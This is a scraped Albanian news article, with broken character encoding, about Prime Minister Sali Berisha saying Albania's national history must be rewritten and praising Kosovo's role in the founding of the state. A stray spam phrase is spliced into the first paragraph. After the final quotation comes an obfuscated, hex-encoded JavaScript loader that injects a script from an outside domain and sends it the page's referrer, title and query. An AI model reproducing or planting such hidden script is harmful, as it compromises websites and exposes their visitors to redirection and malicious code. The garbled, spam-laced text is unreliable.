ALBANIA-KOSOVO-DIPLOMACY-INTERVIEW

Berisha: Historia kombA�tare duhet tA� rishkruhet

himcolin gel how to use. Kryeministri Sali Berisha iu ka rikthyer idesA� sA� tij nA� lidhje me rishikimin e historisA� kombA�tare. Kreu i qeverisA�, e ka cilA�suar si jetim rishqyrtimin e historisA� kombA�tare.

Berisha mbajti njA� fjalim nA� konferencA�n e organizuar nga Ambasada e KosovA�s me temA� a�?Roli i KosovA�s nA� krijimin e shtetit shqiptara�?, ku theksoi se tA� vA�rtetat historike duhet tA� vendosen nA� piedestalin e merituar.

a�?Ne shqiptarA�t kemi nevojA� dhe e kemi jetike tA� shqyrtojmA�, analizojmA� historinA� tonA� kombA�tare e cila pavarA�sisht nga dritA�hijet e saj A�shtA� pa mA�dyshje njA� nga mA� tA� suksesshmet nA� historinA� e kA�tij kontinenti. Por tA� vA�rtetat janA� pA�r tu parA� nA� sy. Ne erdhA�m nA� kA�tA� 100-vjetor si njA� komb i cili historinA� e tij e kishte tA� bazuar nA� njA� falsifikim tA� tmerrshA�m prandaj dhe tA� vA�rtetat historike duhet tA� vendosen nA� piedestalin e merituara�?, theksoi Berisha.

Ai vlerA�soi rolin e KosovA�s nA� pavarA�sinA� e ShqipA�risA� duke e cilA�suar atA� si vendin e ndA�rgjegjes kombA�tare. a�?Betejat e mA�dha u zhvilluan nA� KosovA�. Kosova u shndA�rrua nA� djepin e ndA�rgjegjes kombA�tarA�, nA� zonA�n e themelimit tA� ushtrisA� kombA�tare shqiptare, nA� djepin e idesA� sA� madhe tA� ShqipA�risA� etnikea�? tha kryeministri.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}